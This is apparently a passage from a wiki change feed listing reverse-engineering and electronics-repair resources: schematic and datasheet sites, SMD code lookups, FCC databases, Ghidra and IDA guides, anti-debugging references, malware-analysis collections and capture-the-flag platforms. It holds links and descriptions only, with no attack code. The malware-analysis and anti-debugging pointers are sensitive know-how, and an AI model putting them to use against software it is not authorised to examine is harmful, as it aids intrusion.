::[https://t.me/SMART_PHONE_SCHEMATICS SMART_PHONE_SCHEMATICS] - Collection of smartphone schematics.&lt;br /&gt;
&lt;br /&gt;
=====Software for opening Boardview files=====&lt;br /&gt;
&lt;br /&gt;
::[[Software_Tools#Tools_for_opening_CAD_or_Boardview_files|Tools for opening CAD or Boardview files.]]&lt;br /&gt;
&lt;br /&gt;
====Retro PC Hardware====&lt;br /&gt;
::[https://theretroweb.com/ The Retro Web] - The Retro Web motherboard database, here you can find board photos, BIOS images, manuals and more!&lt;br /&gt;
&lt;br /&gt;
::[https://soggi.org/ Soggi] - Retro hardware BIOS, firmware, drivers, manual, patches, tools, utilities, tech demos, other downloads and specifications available.&lt;br /&gt;
&lt;br /&gt;
====Vintage Audio Equipment Schematics / Manuals====&lt;br /&gt;
::[https://hifigoteborg.se/pdf/ HiFiGoteborg] - LoudAndProud HiFi Goteborg. Schematic archive of old forgotten Hi-Fi from the golden days.&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
===SMD Marking Codes Database===&lt;br /&gt;
&lt;br /&gt;
'''Due to the small size of most SMD components, manufacturers are not able to write the full part number on the case. They use instead a marking code typically composed of a combination of 2 or 3 letters or digits.'''&amp;lt;br&amp;gt;&lt;br /&gt;
'''When repairing an unknown electronic board, it becomes so difficult to know what is the exact type of a given component. This database allows to quickly find the part number of a SMD component when you have only the marking code.'''&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
::[https://www.pcbcart.com/article/content/How-to-Identify-SMD-Components.html PCBCart] - How to Identify SMD Components Explained.&lt;br /&gt;
&lt;br /&gt;
::[https://smd.yooneed.one/ smd.yooneed.one] - A searchable database of electronics SMD components marking codes.&lt;br /&gt;
&lt;br /&gt;
::[https://embedeo.org/smd_codes/ embedeo.org/smd_codes] - SMD marking codes of electronic components such as bipolar transistors (BJT), field effect transistors (FET, MOSFET, JFET), diodes, Zener diodes, Schottky ..&lt;br /&gt;
&lt;br /&gt;
::[https://repaircompanion.com/ RepairCompanion] - Your companion for electronics tools, component identification, calculators, diagnostics and education.&lt;br /&gt;
&lt;br /&gt;
::[https://www.sos.sk/pdf/SMD_Catalog.pdf SOS electronic, The SMD CODEBOOK] - It lists well over 3,400 device codes in alphabetical order, together with type numbers, device characteristics or equivalents and pinout information.&lt;br /&gt;
&lt;br /&gt;
::[http://www.marsport.org.uk/smd/mainframe.htm The SMD Codebook (marsport)] - Online version to look up a SMD codes.&lt;br /&gt;
&lt;br /&gt;
::[https://www.s-manuals.com/smd S-manuals.com] - SMD Markings, SMD codes, ..&lt;br /&gt;
&lt;br /&gt;
===IC Equivlent Database===&lt;br /&gt;
&lt;br /&gt;
'''This might be useful if you run into a problem were you don't have a exact matching replacement part. Now you can use the cross-reference search for an equivalent IC.'''&lt;br /&gt;
&lt;br /&gt;
::[https://alltransistors.com/ All Transistors] - Datasheet. Cross Reference Search. Transistor Database.&lt;br /&gt;
&lt;br /&gt;
::[https://octopart.com/ Octopart] - Lets you search for transistor datasheets but also allows you to filter by key specifications much like AllTransistors cross reference.&lt;br /&gt;
&lt;br /&gt;
===Hardware pinouts (web-based)===&lt;br /&gt;
&lt;br /&gt;
::[https://allpinouts.org/ allpinouts.org] - is a Web-based free content project to list cable and connectors pin-outs.&lt;br /&gt;
&lt;br /&gt;
::[https://pinouts.ru/ pinouts.ru] - Handbook of hardware schemes, cables and connectors layouts pinouts.&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
===Find a image of the PCB without opening the device===&lt;br /&gt;
:# Modify the link below replace &amp;quot;example&amp;quot; without quotes with the product name and model you want to find&lt;br /&gt;
:# Visit the url and the results will show, if it does not show any results it has not been listed in the fccid database.&lt;br /&gt;
::&amp;lt;pre&amp;gt;https://www.google.com/search?tbm=isch&amp;amp;q=example+internal+site:fccid.io&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
::Note that there will be no results if the device does not have a wireless receiver or transmitter inside.&amp;lt;br&amp;gt; Some have used a off-the-shelf (OTS) wireless radio to avoid having to do a new FCC certification. In that case it is useless material and time saving to first quickly image search the ID to check for this.&lt;br /&gt;
::[https://fccid.io/search.php FCCID.io search direct link]&lt;br /&gt;
&lt;br /&gt;
====Electronic certification databases====&lt;br /&gt;
'''If the device is sold in the U.S. and complies with U.S. regulations, see below.'''&amp;lt;br&amp;gt;&lt;br /&gt;
An FCC ID is a unique identifier assigned to a device registered with the United States Federal Communications Commission.&amp;lt;br&amp;gt;&lt;br /&gt;
For legal sale of wireless devices in the US.&lt;br /&gt;
These databases can be of great use if you want to quickly know what kind of wireless communication hardware is used.&amp;lt;br&amp;gt;&lt;br /&gt;
Here you can most often find certifications, type approvals, specifications, instructions, internal/external pictures and sometimes even datasheets.&lt;br /&gt;
&lt;br /&gt;
::* FCC.Report. Provides this easily searchable FCC ID database.&lt;br /&gt;
:::: [https://fcc.report/FCC-ID/ -&amp;gt; FCC.Report]&lt;br /&gt;
::* Device.report. Electronics device database of over 500,000 products with certifications, type approvals, specifications, instructions, and datasheets. &lt;br /&gt;
:::: [https://device.report/ -&amp;gt; Device.Report]&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
===Digital Education===&lt;br /&gt;
:Resources for reverse engineering closed-source software to identify bugs, debug, and conduct penetration testing.&lt;br /&gt;
&lt;br /&gt;
====Reverse Engineering Guides====&lt;br /&gt;
:Tools are great, and sometimes free! Without knowing how to use them, they can be a big waste of time. Better to spend your time learning the basics, then apply your knowledge. &lt;br /&gt;
&lt;br /&gt;
::[http://security.cs.rpi.edu/courses/hwre-spring2014/ CSCI 4974 / 6974 Hardware Reverse Engineering] - Good slide decks on reverse engineering hardware at all levels, IC to PCB.&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/mytechnotalent/Reverse-Engineering-Tutorial Reverse Engineering Tutorial] - A comprehensive reverse engineering tutorial covering x86, x64, 32-bit ARM &amp;amp; 64-bit ARM architectures.&lt;br /&gt;
&lt;br /&gt;
=====Ghidra Documents=====&lt;br /&gt;
'''Class material linked from ghidra.re. Use &amp;lt;u&amp;gt;arrow keys on keyboard&amp;lt;/u&amp;gt; to move through slides.'''&lt;br /&gt;
======Beginner======&lt;br /&gt;
::[https://ghidra.re/ghidra_docs/GhidraClass/Beginner/Introduction_to_Ghidra_Student_Guide.html Introduction to Ghidra Student Guide.]&lt;br /&gt;
======Intermediate======&lt;br /&gt;
::[https://ghidra.re/ghidra_docs/GhidraClass/Intermediate/Intermediate_Ghidra_Student_Guide.html Intermediate to Ghidra Student Guide.]&lt;br /&gt;
======Advanced (PDF)======&lt;br /&gt;
::[https://ghidra.re/ghidra_docs/GhidraClass/Advanced/improvingDisassemblyAndDecompilation.pdf Advanced (PDF).]&lt;br /&gt;
======Advanced Development======&lt;br /&gt;
::[https://ghidra.re/ghidra_docs/GhidraClass/AdvancedDevelopment/GhidraAdvancedDevelopment.html Advanced Development.]&lt;br /&gt;
======Debugger======&lt;br /&gt;
::[https://ghidra.re/ghidra_docs/GhidraClass/Debugger/README.html Debugger.]&lt;br /&gt;
======BSim======&lt;br /&gt;
::[https://ghidra.re/ghidra_docs/GhidraClass/BSim/README.html BSim.]&lt;br /&gt;
&lt;br /&gt;
=====IDA Material=====&lt;br /&gt;
&lt;br /&gt;
::[[File:Reverse Engineering Malware IDA &amp;amp; Olly Basics 5 parts by otw v1.pdf|thumb]] - A Reverse Engineering Malware introduction and bare basics IDA &amp;amp; Olly x86 (5 parts) by otw.&lt;br /&gt;
&lt;br /&gt;
::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-1/ Using IDAPython to Make Your Life Easier: Part 1] - As a malware reverse engineer, I often find myself using IDA Pro in my day-to-day activities. It should come as no surprise, seeing as IDA Pro is the industry standard (although alternatives such as radare2 and Hopper are gaining traction). One of the more powerful features of IDA that I implore all reverse engineers to make use of is the Python addition, aptly named ‘IDAPython’, which exposes a large number of IDA API calls.&lt;br /&gt;
&lt;br /&gt;
:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-2/ Using IDAPython to Make Your Life Easier: Part 2]&lt;br /&gt;
&lt;br /&gt;
:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-3/ Using IDAPython to Make Your Life Easier: Part 3]&lt;br /&gt;
&lt;br /&gt;
:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-4/ Using IDAPython to Make Your Life Easier: Part 4]&lt;br /&gt;
&lt;br /&gt;
:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-5/ Using IDAPython to Make Your Life Easier: Part 5]&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering Some publicly available Malware analysis and Reverse engineering] - is a curated list of awesome materials from the user Dump-GUY a former Forensic, Malware Analyst, Reverse Engineer. [https://www.youtube.com/c/DuMpGuYTrIcKsTeR Youtube channel].&lt;br /&gt;
&lt;br /&gt;
=====x64dbg=====&lt;br /&gt;
&lt;br /&gt;
::[https://help.x64dbg.com/en/latest/introduction/index.html x64dbg] - Introduction &amp;amp; documentation page.&lt;br /&gt;
&lt;br /&gt;
=====Immunity Debugger=====&lt;br /&gt;
&lt;br /&gt;
::[https://class.malware.re/stuff/nardella/basic-reverse-engineering-immunity-debugger-36982.pdf Basic Reverse Engineering with Immunity Debugger] - SANS Institute Information Security Reading Room. Basic Reverse Engineering x86 with Immunity Debugger.&lt;br /&gt;
&lt;br /&gt;
=====Malware Reverse Engineering=====&lt;br /&gt;
&lt;br /&gt;
::[https://tryhackme.com/room/basicmalwarere BasicMalwareRE] - this room aims towards helping everyone learn about the basics of &amp;quot;Malware Reverse Engineering&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
::[https://gist.github.com/IdanBanani/5be0442ad390f89259b494098f450bfd Reversing / Malware Analysis / Assembly -resources] - is a large list of reversing materials and courses.&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/CyberSecurityUP/Awesome-Malware-and-Reverse-Engineering Malware and Reverse Engineering Complete Collection] - Awesome Malware and Reverse Engineering collection by Joas.&lt;br /&gt;
&lt;br /&gt;
=====Anti Debugging Protection Techniques with Examples=====&lt;br /&gt;
======x86 (Win32)======&lt;br /&gt;
&lt;br /&gt;
::[https://anti-debug.checkpoint.com/ cp&amp;lt;r&amp;gt; Anti-Debug Tricks] - By Check Point Research: CPR, x86 &amp;amp; x64.&lt;br /&gt;
&lt;br /&gt;
::[https://www.apriorit.com/dev-blog/367-anti-reverse-engineering-protection-techniques-to-use-before-releasing-software Anti Debugging Protection Techniques with Examples] - A lot of great examples provided by apriorit on their blog, x86 &amp;amp; x64.&lt;br /&gt;
&lt;br /&gt;
::[https://www.codeproject.com/Articles/30815/An-Anti-Reverse-Engineering-Guide An-Anti-Reverse-Engineering-Guide] - By Joshua Tully hosted on CodeProject, Win32/x86 with examples.&lt;br /&gt;
&lt;br /&gt;
::[https://www.openrce.org/reference_library/anti_reversing OpenRCE Anti Reversing Database] - Mostly if not all Win32/x86. The Anti Reverse Engineering Database provides the analysis and desription for a number of various anti debugging, disassembly and dumping tricks. This resource aims to help reverse engineers locate, identify and bypass such techniques.&lt;br /&gt;
&lt;br /&gt;
::[[Media:The “Ultimate” Anti-Debugging.pdf]] - by Peter Ferrie (4 May 2011). This text contains a number of code snippets in both 32-bit and 64-bit versions.&lt;br /&gt;
&lt;br /&gt;
::[[Media:Anti-reverse engineering techniques by Jozef Miljak.pdf]] - An experimental study on which anti-reverse engineering technique are the most effective to protect your software from reversers, Win32/x86.&lt;br /&gt;
&lt;br /&gt;
::[https://forum.tuts4you.com/files/file/1218-anti-reverse-engineering-guide/ Anti-Reverse Engineering Guide By Teddy Rogers] - An individual reading this should have a solid understanding of ASM, how computers handle memory, the Win32 Debugging API, and at least some knowledge of Windows internals. &lt;br /&gt;
&lt;br /&gt;
======x64 (Win64)======&lt;br /&gt;
&lt;br /&gt;
::[https://anti-debug.checkpoint.com/ cp&amp;lt;r&amp;gt; Anti-Debug Tricks] - By Check Point Research: CPR, x86 &amp;amp; x64.&lt;br /&gt;
&lt;br /&gt;
::[https://www.apriorit.com/dev-blog/367-anti-reverse-engineering-protection-techniques-to-use-before-releasing-software Anti Debugging Protection Techniques with Examples] - A lot of great examples provided by apriorit on their blog, x86 &amp;amp; x64.&lt;br /&gt;
&lt;br /&gt;
::[[Media:The “Ultimate” Anti-Debugging.pdf]] - by Peter Ferrie (4 May 2011). This text contains a number of code snippets in both 32-bit and 64-bit versions.&lt;br /&gt;
&lt;br /&gt;
====Machine code or virtual machine bytecode reference==== &lt;br /&gt;
&lt;br /&gt;
=====Assembly reference / manuals=====&lt;br /&gt;
&lt;br /&gt;
======x86======&lt;br /&gt;
&lt;br /&gt;
::[http://ref.x86asm.net/ Reference x86] - Reference X86 Opcode and Instructions (the holy x86 assembly bible).&lt;br /&gt;
&lt;br /&gt;
======x86 Training======&lt;br /&gt;
::[https://x86re.com/1.html Reverse Engineering for Noobs Part 1] - Brief introduction to RE, executables, compiling, 32-bit x86 syntax, and stack frames.&lt;br /&gt;
&lt;br /&gt;
::[https://x86re.com/2.html Reverse Engineering for Noobs Part 2: Portable Executable Files] - Breakdown of Portable Executable image file headers and sections.&lt;br /&gt;
&lt;br /&gt;
======x86 and amd64======&lt;br /&gt;
&lt;br /&gt;
::[https://www.felixcloutier.com/x86/ x86 and amd64 instruction reference] - Derived from the December 2023 version of the Intel® 64 and IA-32 Architectures Software Developer's Manual.&lt;br /&gt;
&lt;br /&gt;
=====Bytecode reference=====&lt;br /&gt;
======Java Virtual Machine (JVM)======&lt;br /&gt;
&lt;br /&gt;
::[https://en.wikipedia.org/wiki/List_of_Java_bytecode_instructions Wikipedia] - List of Java bytecode instructions.&lt;br /&gt;
&lt;br /&gt;
::[https://javaalmanac.io/bytecode/ The Java Version Almanac] - Java Bytecode, by Mnemonic.&lt;br /&gt;
&lt;br /&gt;
======Dalvik opcodes (Android)======&lt;br /&gt;
&lt;br /&gt;
::[http://pallergabor.uw.hu/androidblog/dalvik_opcodes.html Pallergabor] - Dalvik opcodes documentation with examples.&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/user1342/Awesome-Android-Reverse-Engineering Awesome-Android-Reverse-Engineering] - A curated list of awesome Android Reverse Engineering training, resources, and tools.&lt;br /&gt;
&lt;br /&gt;
======Common Language Runtime (CLR) .NET======&lt;br /&gt;
&lt;br /&gt;
::[https://en.wikipedia.org/wiki/List_of_CIL_instructions Wikipedia] - List of CIL instructions.&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/stakx/ecma-335/blob/master/docs/TABLE_OF_CONTENTS.md ECMA-335 Documentation] - This Standard defines the Common Language Infrastructure (CLI).&lt;br /&gt;
&lt;br /&gt;
====Reverse Engineering Challenges====&lt;br /&gt;
&lt;br /&gt;
::[https://crackmes.one/ Crackmes.one] - is a simple place where you can download crackmes to improve your reverse engineering skills.&lt;br /&gt;
&lt;br /&gt;
::[https://crackmy.app/ CrackMy.App] - is as place to share your crackmes, solve challenges, and climb the leaderboard in the ultimate reverse engineering community.&lt;br /&gt;
&lt;br /&gt;
====Security Training Classes====&lt;br /&gt;
&lt;br /&gt;
::[https://ost2.fyi/ OpenSecurityTraining2] - is a free, beta-stage online platform built on Open edX that offers in-depth cybersecurity and reverse-engineering courses like x86 assembly, kernel exploitation, and firmware analysis.&lt;br /&gt;
&lt;br /&gt;
====Security CTF====&lt;br /&gt;
Capture the Flag (CTF) in computer security is an exercise in which participants attempt to find text strings, called &amp;quot;flags&amp;quot;, which are secretly hidden in purposefully vulnerable programs or websites.&amp;lt;br&amp;gt;&lt;br /&gt;
Learn more about reverse engineering and cybersecurity start playing CTF's.&lt;br /&gt;
&lt;br /&gt;
::[https://jaimelightfoot.com/blog/so-you-want-to-ctf-a-beginners-guide/ CTF Beginners Guide] - is intended to be a guide for beginners who have just started playing CTFs (or for people who have never played, but would like to).&lt;br /&gt;
&lt;br /&gt;
::[https://ctflearn.com/ CTFlearn] - The most beginner-friendly way to get into hacking. Challenges Test your skills by hacking your way through hundreds of challenges.&lt;br /&gt;
&lt;br /&gt;
::[https://ctf101.org/ CTF101] - a site documenting the basics of playing Capture the Flags. This guide was written and maintained by the OSIRIS Lab at New York University.&lt;br /&gt;
&lt;br /&gt;
::[https://picoctf.org/ picoCTF] - is a free computer security education program with original content built on a capture-the-flag framework created by security and privacy experts.&lt;br /&gt;
&lt;br /&gt;
::[https://microcorruption.com/ MicroCorruption] - is a online, embedded debugger that starts from scratch and introduces the very foundations of memory corruption. Great practice for learning the basics of binary exploitation.&lt;br /&gt;
&lt;br /&gt;
::[https://echoctf.red/ echoctf.red] - A platform to develop, run and administer CTF competitions. The online echoCTF.RED platform user interfaces and codebase.&lt;br /&gt;
&lt;br /&gt;
::[https://pwnable.kr/ Wargames Pwnable.kr] - is a non-commercial wargame site which provides various pwn challenges regarding system exploitation, including reverse engineering, web exploitation, and cryptography.&lt;br /&gt;
&lt;br /&gt;
::[https://pwnable.tw/challenge/ Wargames Pwnable.tw] - is a wargame site for hackers to test and expand their binary exploiting skills. HOW-TO. Try to find out the vulnerabilities exists.&lt;br /&gt;
&lt;br /&gt;
::[https://ctfsites.github.io/ More CTF sites] - A curated list of more CTF sites on Github.&lt;br /&gt;
&lt;br /&gt;
====Embedded security Challenge (ESC)====&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/TrustworthyComputing/csaw_esc_2025 csaw_esc_2025] - CSAW 2025 Embedded Security Challenge (Github repo).&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/TrustworthyComputing/csaw_esc_2024 csaw_esc_2024] - CSAW 2024 Embedded Security Challenge (Github repo).&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/TrustworthyComputing/csaw_esc_2023 csaw_esc_2023] - CSAW 2023 Embedded Security Challenge (Github repo).&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/TrustworthyComputing/csaw_esc_2022 csaw_esc_2022] - CSAW 2022 Embedded Security Challenge (Github repo).&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/TrustworthyComputing/csaw_esc_2021 csaw_esc_2021] - CSAW 2021 Embedded Security Challenge (Github repo).&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/TrustworthyComputing/csaw_esc_2019 csaw_esc_2019] - CSAW 2019 Embedded Security Challenge (Github repo).&lt;br /&gt;
&lt;br /&gt;
====800 MHz AMPS Documentation====&lt;br /&gt;
::[https://wiki.recessim.com/w/images/8/86/Cellular_Telephone_Bible_With_SIDs.txt The Cellular Telephone Bible by Mike Larsen (1997)] Unlock codes and programming procedures of early 800 MHz analog AMPS cellular phones. This document also contains the system IDs (SID) of the 800 MHz analog service providers.&lt;/div&gt;</summary>
		<author><name>Polymorphic7</name></author>
		
	</entry>
	<entry>
		<id>https://wiki.recessim.com/w/index.php?title=Literature&amp;diff=3270</id>
		<title>Literature</title>
		<link rel="alternate" type="text/html" href="https://wiki.recessim.com/w/index.php?title=Literature&amp;diff=3270"/>
		<updated>2026-02-10T19:08:01Z</updated>

		<summary type="html">&lt;p&gt;Polymorphic7: Catch up a caugh. Exam failed.&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Books, Journals, Magazines, Datasheets and all other literature related to reverse engineering is welcome here. The book pictured is the bound edition of a portion of the PDF's available in the PoC||GTFO section.[[File:POCorGTFO.jpg|thumb|&amp;lt;nowiki&amp;gt;Bound edition of PoC||GTFO, Proof of Concept OR Get The Fuck Out.&amp;lt;/nowiki&amp;gt;]]&lt;br /&gt;
&lt;br /&gt;
===Books and Magazines===&lt;br /&gt;
::[[PoCorGTFO|PoC||GTFO]] - International Journal of Proof-of-Concept or Get The Fuck Out (Mirror)&lt;br /&gt;
&lt;br /&gt;
::[https://wiki.recessim.com/w/images/0/01/HackingTheXbox_Free.pdf Hacking the Xbox] - An Introduction to Reverse Engineering by Andrew &amp;quot;bunnie&amp;quot; Huang&lt;br /&gt;
&lt;br /&gt;
::[https://nostarch.com/hardwarehackerpaperback The Hardware Hacker] - Manufacturing and Open Hardware by Andrew &amp;quot;bunnie&amp;quot; Huang&lt;br /&gt;
&lt;br /&gt;
::[https://www.lehmanns.de/shop/mathematik-informatik/56052761-9781789619133-practical-hardware-pentesting Practical Hardware Pentesting] - A guide to attacking embedded systems and protecting them against the most common hardware attacks (ISBN 978-1-78961-913-3).&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks Awesome-Cybersecurity-Handbooks] - Big collection of documents for cybersecurity &amp;amp; reverse engineering.&lt;br /&gt;
&lt;br /&gt;
===Datasheets, boardviews, schematics, manuals===&lt;br /&gt;
&lt;br /&gt;
====Generic (various fields)====&lt;br /&gt;
&lt;br /&gt;
'''The curralated list below provides a wide range of useful websites offering resources regarding repair of wide range of electronic devices.'''&lt;br /&gt;
&lt;br /&gt;
::[https://www.eserviceinfo.com/ e-service info] - Here you can find free datasheets, service manuals, schema, schematic diagrams and software downloads, service menu and mode information, code calculators for many brands of equipment. Search in all service docs that are OCR'd.&lt;br /&gt;
&lt;br /&gt;
::[https://www.docin.com/ DOCin] - Chinese datasheet and other documents website&lt;br /&gt;
&lt;br /&gt;
::[https://www.espec.ws/ espec.ws] [https://www.google.com/search?q=file%3Apdf%20site%3Ahttps%3A%2F%2Fmonitor.espec.ws%2Ffiles 1e100 Dork]- Russian site for people specializing in the repair and development of electronic equipment or who want to learn how to do it. Has a archive with datasheets and schematics.&lt;br /&gt;
&lt;br /&gt;
::[https://www.badcaps.net/ Badcaps] - Badcaps Electronics Repair Forum &amp;amp; Schematic Search.&lt;br /&gt;
&lt;br /&gt;
::[https://www.eserviceinfo.com/browse.php eServiceInfo] - Service manuals, schematics, documentation, programs, electronics, hobby ....&lt;br /&gt;
&lt;br /&gt;
::[https://elektrotanya.com/keres Elektrotanya] - This site helps you to save the Earth from electronic waste! Schemetics, Service manuals, etc.&lt;br /&gt;
&lt;br /&gt;
::[https://servlib.com/ ServLib] - The largest library of service manuals and schematics for Sony, Panasonic, Sharp, JBL. Repair information for electronics technicians. [https://github.com/AriZoneVibes/ServLibScrapper/ Scraper for ServLib].&lt;br /&gt;
&lt;br /&gt;
::[https://www.freeservicemanuals.info FreeServiceManuals] - Free Service Manuals goal is to provide free schematics and (service) manuals for almost all brands of electronic devices.&lt;br /&gt;
&lt;br /&gt;
::[http://www.nostatech.nl/ Nostatech] - Nostatech's Free Service Manuals goal is to provide free schematics and (service) manuals for almost all brands of electronic devices.&lt;br /&gt;
&lt;br /&gt;
::[https://www.alldatasheet.com/ Alldatasheets] - Chinese datasheet database.&lt;br /&gt;
&lt;br /&gt;
::[https://alltransistors.com/ All Transistors] - All Transistors Datasheet. Cross Reference Search. Transistor Database.&lt;br /&gt;
&lt;br /&gt;
::[https://remont-aud.net/ Remont-aud] - Russian website offering a collection of schematics, datasheets and firmware dumps.&lt;br /&gt;
&lt;br /&gt;
::[http://rom.by/ rom.by] - Russian website has verious rom dumps, datasheet and schematics&lt;br /&gt;
&lt;br /&gt;
::[https://whycan.com whycan.com] - A Chinese embedded ARM development community offering a collection of schematics, SDKs for different platforms, datasheets, and firmware dumps.&lt;br /&gt;
&lt;br /&gt;
::[https://www.s-manuals.com/ S-manuals.com] - Schematics, Service Manuals, ..&lt;br /&gt;
&lt;br /&gt;
::[https://www.schematicsunlimited.com/ schematicsunlimited.com] - Download FREE diagrams, schematics, service manuals, operating manuals and other useful information for a variety of products.&lt;br /&gt;
&lt;br /&gt;
====Portable computers, smartphones, videocards, printers, TVs====&lt;br /&gt;
&lt;br /&gt;
'''The curralated list below provides a wide range of useful websites offering resources regarding repair of mostly smartphones, printers and laptops / notebooks.'''&lt;br /&gt;
&lt;br /&gt;
::[https://vlab.su/ Vlab.su] - Russian virtual repair community. Virtual repair laboratory. Any problem can be solved together.&lt;br /&gt;
&lt;br /&gt;
::[https://www.macdat.net/ macdat.net] - is a hobbyist-run website offering a detailed database of vintage laptop specs and Macintosh repair resources, including capacitor guides and service schematics.&lt;br /&gt;
&lt;br /&gt;
::[https://www.electronica-pt.com/ Electrónica PT] - Portuguese community for basic and advanced electronics, electronic repair support center.&lt;br /&gt;
&lt;br /&gt;
::[https://thetechstall.com/ The Tech Stall] - Download all the necessary tools for laptop and desktop motherboard diagnostics and fixes at no cost for free to reduce e-waste and spare the environment.&lt;br /&gt;
&lt;br /&gt;
::[https://www.cyberforum.ru/notebook-circuit/ Cyberforum] - A Russian forum for programmers and system administrators also offering some schematics and boardview for repair.&lt;br /&gt;
&lt;br /&gt;
::[https://zremcom.ru/scheme/scheme-laptops Zremcom] - A Russian website for repair, setup of servers, computers. Service manuals and diagrams for computers, laptops and power supplies.&lt;br /&gt;
&lt;br /&gt;
::[https://www.alisaler.com/ AliSaler] - Website offering EC &amp;amp; Bios firmwares / bins, datasheets, boardviews, schematics, ic equivalent information, and programmer software for laptops.&lt;br /&gt;
&lt;br /&gt;
::[https://www.alifixit.com/ AliFixit] - We believe in reviving technology and minimizing electronic waste. As our field is computers and laptops, we are here trying to provide as much stuff as possible for free to make our contribution.&lt;br /&gt;
&lt;br /&gt;
::[https://www.indiafix.in/p/schematic-and-boardview-collection.html IndiaFix] - Free laptop schematic &amp;amp; boardviews downloads. Desktop bios dumps, and free repair tips.&lt;br /&gt;
&lt;br /&gt;
::[https://www.apple-schematic.se/ Apple Schematic] - Free schematic and boardview (BRD) for Apple Macbooks and other Apple devices.&lt;br /&gt;
&lt;br /&gt;
::[https://novoselovvlad.ru/ Novoselovvlad.ru] - Blog of the workshop of Vladislav Novoselov (offers schematics, bios dumps, and various other helpful tools).&lt;br /&gt;
&lt;br /&gt;
::[http://printer1.blogspot.com/ printer1] - Collection of service manuals for printers and laptops.&lt;br /&gt;
&lt;br /&gt;
::[https://www.tvservice.org/ TV Service] - is a Russian website offering datasheets and schematics for TV repair.&lt;br /&gt;
&lt;br /&gt;
::[https://www.smarttvmanuals.net/ Smart Tv Manuals &amp;amp; Circuit Board Diagrams] - is a website offering datasheets and schematics for Smart TV repair.&lt;br /&gt;
&lt;br /&gt;
::[https://www.informaticanapoli.it/manuali-di-servizio/ informaticanapoli] - Italian website that offers service manuals and schematics for various laptop brands.&lt;br /&gt;
&lt;br /&gt;
::[https://www.gadget-manual.com/nvidia-geforce/ Gadget-Manual] - Graphic card manuals boardviews and datasheets.&lt;br /&gt;
&lt;br /&gt;
::[https://sector.biz.ua/docs/schematic_diagrams_msi_motherboards/schematic_diagrams_msi_motherboards.phtml Sector] - Russian website offering schemetic diagrams, datasheets and boardviews (Asrock, Asus, ECS, Gigabyte, Acer, IBM/Lenovo).&lt;br /&gt;
&lt;br /&gt;
::[https://schematic-x.blogspot.com/ Schematic-x] - Free laptops &amp;amp; desktop schematic diagrams and BIOS downloads.&lt;br /&gt;
&lt;br /&gt;
::[https://www.s-manuals.com/notebook S-manuals.com] - Notebooks, Schematics, Service Manuals, ..&lt;br /&gt;
&lt;br /&gt;
=====Laptop or smartphone Boardview / Schematic / Firmware [Groups]=====&lt;br /&gt;
::[https://t.me/schematicslaptop schematicslaptop] - Laptop schematics.&lt;br /&gt;
&lt;br /&gt;
::[https://t.me/biosarchive biosarchive] - The largest channel of archived bios (firmwares) of laptops.&lt;br /&gt;
&lt;br /&gt;
::[https://t.me/SMART_PHONE_SCHEMATICS SMART_PHONE_SCHEMATICS] - Collection of smartphone schematics.&lt;br /&gt;
&lt;br /&gt;
=====Software for opening Boardview files=====&lt;br /&gt;
&lt;br /&gt;
::[[Software_Tools#Tools_for_opening_CAD_or_Boardview_files|Tools for opening CAD or Boardview files.]]&lt;br /&gt;
&lt;br /&gt;
====Retro PC Hardware====&lt;br /&gt;
::[https://theretroweb.com/ The Retro Web] - The Retro Web motherboard database, here you can find board photos, BIOS images, manuals and more!&lt;br /&gt;
&lt;br /&gt;
::[https://soggi.org/ Soggi] - Retro hardware BIOS, firmware, drivers, manual, patches, tools, utilities, tech demos, other downloads and specifications available.&lt;br /&gt;
&lt;br /&gt;
====Vintage Audio Equipment Schematics / Manuals====&lt;br /&gt;
::[https://hifigoteborg.se/pdf/ HiFiGoteborg] - LoudAndProud HiFi Goteborg. Schematic archive of old forgotten Hi-Fi from the golden days.&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
===SMD Marking Codes Database===&lt;br /&gt;
&lt;br /&gt;
'''Due to the small size of most SMD components, manufacturers are not able to write the full part number on the case. They use instead a marking code typically composed of a combination of 2 or 3 letters or digits.'''&amp;lt;br&amp;gt;&lt;br /&gt;
'''When repairing an unknown electronic board, it becomes so difficult to know what is the exact type of a given component. This database allows to quickly find the part number of a SMD component when you have only the marking code.'''&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
::[https://www.pcbcart.com/article/content/How-to-Identify-SMD-Components.html PCBCart] - How to Identify SMD Components Explained.&lt;br /&gt;
&lt;br /&gt;
::[https://smd.yooneed.one/ smd.yooneed.one] - A searchable database of electronics SMD components marking codes.&lt;br /&gt;
&lt;br /&gt;
::[https://embedeo.org/smd_codes/ embedeo.org/smd_codes] - SMD marking codes of electronic components such as bipolar transistors (BJT), field effect transistors (FET, MOSFET, JFET), diodes, Zener diodes, Schottky ..&lt;br /&gt;
&lt;br /&gt;
::[https://repaircompanion.com/ RepairCompanion] - Your companion for electronics tools, component identification, calculators, diagnostics and education.&lt;br /&gt;
&lt;br /&gt;
